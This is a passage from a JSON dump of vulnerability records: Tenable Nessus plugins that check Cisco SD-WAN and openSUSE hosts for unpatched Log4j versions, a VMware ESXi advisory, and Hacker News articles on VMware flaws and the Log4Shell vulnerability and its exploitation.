script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:sd-wan_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:sd-wan_vmanage\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_vedge_detect.nbin\");\n script_require_keys(\"Cisco/Viptela/Version\", \"Cisco/Viptela/Model\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Viptela');\n\nif (tolower(product_info['model']) !~ \"vmanage\")\n audit(AUDIT_HOST_NOT, 'an affected model');\n\nvar vuln_ranges = [\n { 'min_ver' : '20.3', 'fix_ver' : '20.3.4.1' },\n { 'min_ver' : '20.4', 'fix_ver' : '20.4.2.1' },\n { 'min_ver' : '20.5', 'fix_ver' : '20.5.1.1' },\n { 'min_ver' : '20.6', 'fix_ver' : '20.6.2.1' }\n];\n\n \nvar reporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'bug_id' , 'CSCwa47745',\n 'version' , product_info['version'],\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n vuln_ranges:vuln_ranges,\n reporting:reporting\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:36:45", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:1577-1 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-17T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1577-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:log4j", "p-cpe:/a:novell:opensuse:log4j-javadoc", "p-cpe:/a:novell:opensuse:log4j-jcl", "p-cpe:/a:novell:opensuse:log4j-slf4j", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-1577.NASL", "href": "https://www.tenable.com/plugins/nessus/156146", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1577-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156146);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1577-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:1577-1 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193611\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/OHVQSNSG4OZ336XWLNWGUL3TQE2ZZODK/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53a91573\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-44228\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j, log4j-javadoc, log4j-jcl and / or log4j-slf4j packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-jcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-slf4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.2', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'log4j-2.13.0-lp152.3.3.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-javadoc-2.13.0-lp152.3.3.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-jcl-2.13.0-lp152.3.3.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-slf4j-2.13.0-lp152.3.3.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-javadoc / log4j-jcl / log4j-slf4j');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "vmware": [{"lastseen": "2023-12-03T16:01:22", "description": "3a. Use-after-free vulnerability in XHCI USB controller (CVE-2021-22040) \n\nVMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller.VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.4. \n\n3b. Double-fetch vulnerability in UHCI USB controller (CVE-2021-22041) \n\nVMware ESXi, Workstation, and Fusion contain a double-fetch vulnerability in the UHCI USB controller. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.4. \n\n3c. ESXi settingsd unauthorized access vulnerability (CVE-2021-22042) \n\nVMware ESXi contains an unauthorized access vulnerability due to VMX having access to settingsd authorization tickets. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.2. \n\n3d. ESXi settingsd TOCTOU vulnerability (CVE-2021-22043) \n\nVMware ESXi contains a TOCTOU (Time-of-check Time-of-use) vulnerability that exists in the way temporary files are handled. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.2. \n\n3e. ESXi slow HTTP POST denial of service vulnerability (CVE-2021-22050) \n\nESXi contains a slow HTTP POST denial-of-service vulnerability in rhttpproxy. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-15T00:00:00", "type": "vmware", "title": "VMware ESXi, Workstation, and Fusion updates address multiple security vulnerabilities (CVE-2021-22040, CVE-2021-22041, CVE-2021-22042, CVE-2021-22043, CVE-2021-22050)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22040", "CVE-2021-22041", "CVE-2021-22042", "CVE-2021-22043", "CVE-2021-22050"], "modified": "2022-02-15T00:00:00", "id": "VMSA-2022-0004", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0004.html", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:33", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEgyKfc9__syaqldjnfRLkbKcjq_aRPiyYzPVxRRgvqf6mHz5C-K5EVCbYZfHzH8Pgsg5AMT4EIZKDLjRLmSb1WevPfBxvC38w22PcPnvPor5LWJLTxMC8WzseBJm3IJIHUtOZRLjFH_bKLqQj8XIPAfXq8afPepck3DaT086jfx2ASbXCD9XMDejboM)](<https://thehackernews.com/new-images/img/a/AVvXsEgyKfc9__syaqldjnfRLkbKcjq_aRPiyYzPVxRRgvqf6mHz5C-K5EVCbYZfHzH8Pgsg5AMT4EIZKDLjRLmSb1WevPfBxvC38w22PcPnvPor5LWJLTxMC8WzseBJm3IJIHUtOZRLjFH_bKLqQj8XIPAfXq8afPepck3DaT086jfx2ASbXCD9XMDejboM>)\n\nVMware on Tuesday patched several [high-severity](<https://www.vmware.com/security/advisories/VMSA-2022-0004.html>) [vulnerabilities](<https://www.vmware.com/security/advisories/VMSA-2022-0005.html>) impacting ESXi, Workstation, Fusion, Cloud Foundation, and NSX Data Center for vSphere that could be exploited to execute arbitrary code and cause a denial-of-service (DoS) condition.\n\nAs of writing, there's no evidence that any of the weaknesses are exploited in the wild. The list of six flaws is as follows \u2013\n\n * **CVE-2021-22040** (CVSS score: 8.4) - Use-after-free vulnerability in XHCI USB controller\n * **CVE-2021-22041** (CVSS score: 8.4) - Double-fetch vulnerability in UHCI USB controller\n * **CVE-2021-22042** (CVSS score: 8.2) - ESXi settingsd unauthorized access vulnerability\n * **CVE-2021-22043** (CVSS score: 8.2) - ESXi settingsd TOCTOU vulnerability\n * **CVE-2021-22050** (CVSS score: 5.3) - ESXi slow HTTP POST denial-of-service vulnerability\n * **CVE-2022-22945** (CVSS score: 8.8) - CLI shell injection vulnerability in the NSX Edge appliance component\n\nSuccessful exploitation of the flaws could allow a malicious actor with local administrative privileges on a virtual machine to execute code as the virtual machine's VMX process running on the host. It could also allow the adversary with access to settingsd to escalate their privileges by writing arbitrary files.\n\nAdditionally, CVE-2021-22050 could be weaponized by an adversary with network access to ESXi to create a DoS condition by overwhelming rhttpproxy service with multiple requests. Last but not least, CVE-2022-22945 could permit an attacker with SSH access to an NSX-Edge appliance (NSX-V) to run arbitrary commands on the operating system as root user.\n\nFour of the issues were originally discovered as part of the [Tianfu Cup](<https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html>) held last year in China, with the virtualization services provider working with the contest's organizers to review the findings and receive the information privately.\n\n\"The ramifications of this vulnerability are serious, especially if attackers have access to workloads inside your environments,\" VMware [noted](<https://core.vmware.com/vmsa-2022-0004-questions-answers-faq>) in a separate FAQ. \"Organizations that practice change management using the [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types would consider this an 'emergency change.'\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T11:25:00", "type": "thn", "title": "VMware Issues Security Patches for High-Severity Flaws Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22040", "CVE-2021-22041", "CVE-2021-22042", "CVE-2021-22043", "CVE-2021-22050", "CVE-2022-22945"], "modified": "2022-02-18T03:18:38", "id": "THN:A6706F6A6D380D968EF32C856D9C796F", "href": "https://thehackernews.com/2022/02/vmware-issues-security-patches-for-high.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:45", "description": "[![Log4Shell Exploit](https://thehackernews.com/new-images/img/a/AVvXsEg6YZzGXTUELW4pVOf4TR_Z-Qu-x0FLnC6O4tsA48fIowXPd6l-VHroZpdt_FLum2bVjowvoyLiZQ30kmeZezCpr5zpmeEm-Rantvt6rCc2h6H2LoHPLmnj1ke77tMwetH9Riv19RhTKszdj6420Dk7SQ0_31L-lUrp4s9whx7HjgJgrT-vgNYmBMP5=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEg6YZzGXTUELW4pVOf4TR_Z-Qu-x0FLnC6O4tsA48fIowXPd6l-VHroZpdt_FLum2bVjowvoyLiZQ30kmeZezCpr5zpmeEm-Rantvt6rCc2h6H2LoHPLmnj1ke77tMwetH9Riv19RhTKszdj6420Dk7SQ0_31L-lUrp4s9whx7HjgJgrT-vgNYmBMP5>)\n\nA never-before-seen China-based targeted intrusion adversary dubbed **Aquatic Panda **has been observed leveraging [critical flaws](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>) in the Apache Log4j logging library as an access vector to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems.\n\nCybersecurity firm CrowdStrike said the infiltration, which was ultimately foiled, was aimed at an unnamed \"large academic institution.\" The state-sponsored group is believed to have been operating since mid-2020 in pursuit of intelligence collection and industrial espionage, with its attacks primarily directed against companies in the telecommunications, technology, and government sectors.\n\nThe attempted intrusion exploited the newly discovered [Log4Shell](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) flaw (CVE-2021-44228, CVSS score: 10.0) to gain access to a vulnerable instance of the [VMware Horizon](<https://kb.vmware.com/s/article/87073>) desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch threat actor payloads hosted on a remote server.\n\n[![Log4Shell Exploit](https://thehackernews.com/new-images/img/a/AVvXsEgqBlahJbsTfoccuO0N2zuhjjsJP3u8aIaRLaVSRXFnw-s5991WD8rNH0pslvdX_M4U5o1Am83333vRx3MvPKf_LSw64qAultRxSib6Ebm8qT9Q3x6RiZTIxNw1_hAzRYIrmyUVFtvTzWqxzzalobjd8WqD1HnBX4oqEVVggd_9aknnqQfB3vb0RE0y=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgqBlahJbsTfoccuO0N2zuhjjsJP3u8aIaRLaVSRXFnw-s5991WD8rNH0pslvdX_M4U5o1Am83333vRx3MvPKf_LSw64qAultRxSib6Ebm8qT9Q3x6RiZTIxNw1_hAzRYIrmyUVFtvTzWqxzzalobjd8WqD1HnBX4oqEVVggd_9aknnqQfB3vb0RE0y>)\n\n\"A modified version of the Log4j exploit was likely used during the course of the threat actor's operations,\" the researchers [noted](<https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/>), adding it involved the use of an exploit that was published in GitHub on December 13, 2021.\n\nAquatic Panda's malicious behavior went beyond conducting reconnaissance of the compromised host, starting with making an effort to stop a third-party endpoint detection and response (EDR) service, before proceeding to retrieve next-stage payloads designed to obtain a reverse shell and harvest credentials.\n\nBut after the victim organization was alerted to the incident, the entity \"was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.\" In light of the attack's successful disruption, the exact intent remains unknown.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-30T10:07:00", "type": "thn", "title": "Chinese APT Hackers Used Log4Shell Exploit to Target Academic Institution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-30T10:07:36", "id": "THN:7958F9B1AA180122992C6A0FADB03536", "href": "https://thehackernews.com/2021/12/chinese-apt-hackers-used-log4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:49", "description": "[![Log4J Vulnerability](https://thehackernews.com/new-images/img/a/AVvXsEgul5prT8igF6QOpUFSIDyQRmLuxGJ2c92UiBBFSTwQokAb-z9IAS8NOTkurRSsXUlWiO594AQKF5F5poW2VwixXqlS-0kR52JN7RdZ_sGdKfylB_GKWjo5-Hz-cVwcHEOlqUsE9doPNzxVSfhN-5l5odfF0Azpw2a7CZI3P1m684txHPPtg3ffHRZI=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgul5prT8igF6QOpUFSIDyQRmLuxGJ2c92UiBBFSTwQokAb-z9IAS8NOTkurRSsXUlWiO594AQKF5F5poW2VwixXqlS-0kR52JN7RdZ_sGdKfylB_GKWjo5-Hz-cVwcHEOlqUsE9doPNzxVSfhN-5l5odfF0Azpw2a7CZI3P1m684txHPPtg3ffHRZI>)\n\nThe Apache Software Foundation has released fixes to contain an [actively](<https://twitter.com/DTCERT/status/1469258597930614787>) [exploited](<https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/>) zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be weaponized to execute malicious code and allow a complete takeover of vulnerable systems.\n\nTracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) and by the monikers Log4Shell or LogJam, the issue concerns a case of unauthenticated, remote code execution (RCE) on any application that uses the open-source utility and affects versions Log4j 2.0-beta9 up to 2.14.1. The bug has scored a perfect 10 on 10 in the CVSS rating system, indicative of the severity of the issue.\n\n\"An attacker who can control log messages or log message parameters can execute arbitrary code loaded from [LDAP](<https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol>) servers when message lookup substitution is enabled,\" the Apache Foundation [said](<https://logging.apache.org/log4j/2.x/security.html>) in an advisory. \"From Log4j 2.15.0, this behavior has been disabled by default.\"\n\nExploitation can be achieved by a single string of text, which can trigger an application to reach out to a malicious external host if it is logged via the vulnerable instance of Log4j, effectively granting the adversary the ability to retrieve a payload from a remote server and execute it locally. The project maintainers credited Chen Zhaojun of Alibaba Cloud Security Team with discovering the issue.\n\nLog4j is used as a logging package in a variety of different [popular software](<https://github.com/YfryTchsGD/Log4jAttackSurface>) by a [number of manufacturers](<https://www.lunasec.io/docs/blog/log4j-zero-day/>), including Amazon, Apple iCloud, [Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd>), [Cloudflare](<https://blog.cloudflare.com/how-cloudflare-security-responded-to-log4j2-vulnerability/>), ElasticSearch, [Red Hat](<https://access.redhat.com/security/vulnerabilities/RHSB-2021-009>), Steam, Tesla, Twitter, and video games such as [Minecraft](<https://twitter.com/Minecraft/status/1469303202864582658>). In the case of the latter, attackers have been able to [gain RCE on Minecraft Servers](<https://twitter.com/MalwareTechBlog/status/1469290238702874625>) by simply pasting a specially crafted message into the chat box.\n\n## A huge attack surface\n\n\"The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we have seen this year,\" said Bharat Jogi, senior manager of vulnerabilities and signatures at Qualys. \"Log4j is a ubiquitous library used by millions of Java applications for logging error messages. This vulnerability is trivial to exploit.\"\n\nCybersecurity firms [BitDefender](<https://www.bitdefender.com/blog/labs/bitdefender-honeypots-signal-active-log4shell-0-day-attacks-underway-patch-immediately/>), [Cisco Talos](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>), [Huntress Labs](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>), and [Sonatype](<https://blog.sonatype.com/a-new-0-day-log4j-vulnerability-discovered-in-the-wild>) have all confirmed evidence of [mass scanning](<https://twitter.com/bad_packets/status/1469225135504650240>) of affected applications in the wild for vulnerable servers and attacks registered against their honeypot networks following the [availability](<https://github.com/tangxiaofeng7/apache-log4j-poc>) of a proof-of-concept ([PoC](<https://twitter.com/artsploit/status/1469245422153699329>)) exploit. \"This is a low skilled attack that is extremely simple to execute,\" Sonatype's Ilkka Turunen said.\n\nGreyNoise, likening the flaw to [Shellshock](<https://en.wikipedia.org/wiki/Shellshock_\$software_bug\$>), said it [observed malicious activity](<https://www.greynoise.io/blog/apache-log4j-vulnerability-CVE-2021-44228>) targeting the vulnerability commencing on December 9, 2021. Web infrastructure company Cloudflare [noted](<https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/>) that it blocked roughly 20,000 exploit requests per minute around 6:00 p.m. UTC on Friday, with most of the exploitation attempts originating from Canada, the U.S., Netherlands, France, and the U.K.\n\n[![Log4J Vulnerability](https://thehackernews.com/new-images/img/a/AVvXsEiF0T2Z3ZhJuJvi4iXOVnMObpEIIkpeySrUTULgZGMDn-kF_woeWWzSyQdA4pbTO1NCpBIs07LACczt-w0XPrARbsx4PB2TOP3hm61TAj5wTY4ZpoqevnUrhmCiRs394f2SDSExwyCzjhugrmJ43kWXM9jTclkZ_-sSBs4WylRTHXSpkPnp0T5UxN_e=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEiF0T2Z3ZhJuJvi4iXOVnMObpEIIkpeySrUTULgZGMDn-kF_woeWWzSyQdA4pbTO1NCpBIs07LACczt-w0XPrARbsx4PB2TOP3hm61TAj5wTY4ZpoqevnUrhmCiRs394f2SDSExwyCzjhugrmJ43kWXM9jTclkZ_-sSBs4WylRTHXSpkPnp0T5UxN_e>)\n\nGiven the ease of exploitation and prevalence of Log4j in enterprise IT and DevOps, [in-the-wild attacks](<https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22>) aimed at susceptible servers are expected to ramp up in the coming days, making it imperative to address the flaw immediately. Israeli cybersecurity firm Cybereason has also released a fix called \"[Logout4Shell](<https://github.com/Cybereason/Logout4Shell>)\" that closes out the shortcoming by using the vulnerability itself to reconfigure the logger and prevent further exploitation of the attack.\n\n\"This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string,\" Security expert Marcus Hutchins [said](<https://twitter.com/MalwareTechBlog/status/1469289471463944198>) in a tweet.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 